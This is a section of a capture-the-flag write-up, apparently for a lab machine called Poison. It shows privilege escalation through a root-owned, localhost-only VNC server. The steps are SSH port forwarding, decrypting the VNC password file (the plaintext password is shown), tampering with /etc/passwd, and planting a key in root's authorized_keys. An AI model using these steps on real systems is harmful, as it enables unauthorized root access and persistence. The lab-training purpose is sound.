4. Privilege escalation: vncviewer → root

charix@Poison:~ % netstat -anp tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0     44 10.10.10.84.22         10.10.16.5.34152       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN

# ps auxww shows Xvnc running as root, bound to localhost only (-localhost, -rfbport 5901) and using the password file /root/.vnc/passwd
root     529  0.0  0.9  23608  9020 v0- I    22:54    0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1

# forward a local port over SSH so the localhost-only VNC service becomes reachable

$ ssh -L 5000:localhost:5901 charix@10.10.10.84

Using https://github.com/trinitronx/vncpasswd.py
# the obfuscated VNC password file `secret` can be decrypted:

$ /opt/vncpasswd.py/vncpasswd.py -d -f secret
Decrypted Bin Pass= 'VNCP@$$!'
Decrypted Hex Pass= '564e435040242421'

# connect with remmina, or:
# vncviewer localhost:5000 -passwd secret

# first tried the "sticky bandit" approach, but had issues running /bin/csh
# then made /etc/passwd writable and added a new line, but su errored and sudo is not installed
# finally, adding id_rsa.pub to /root/.ssh/authorized_keys worked:

$ ssh -i id_rsa root@10.10.10.84
root@Poison:~ # whoami;id
root
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
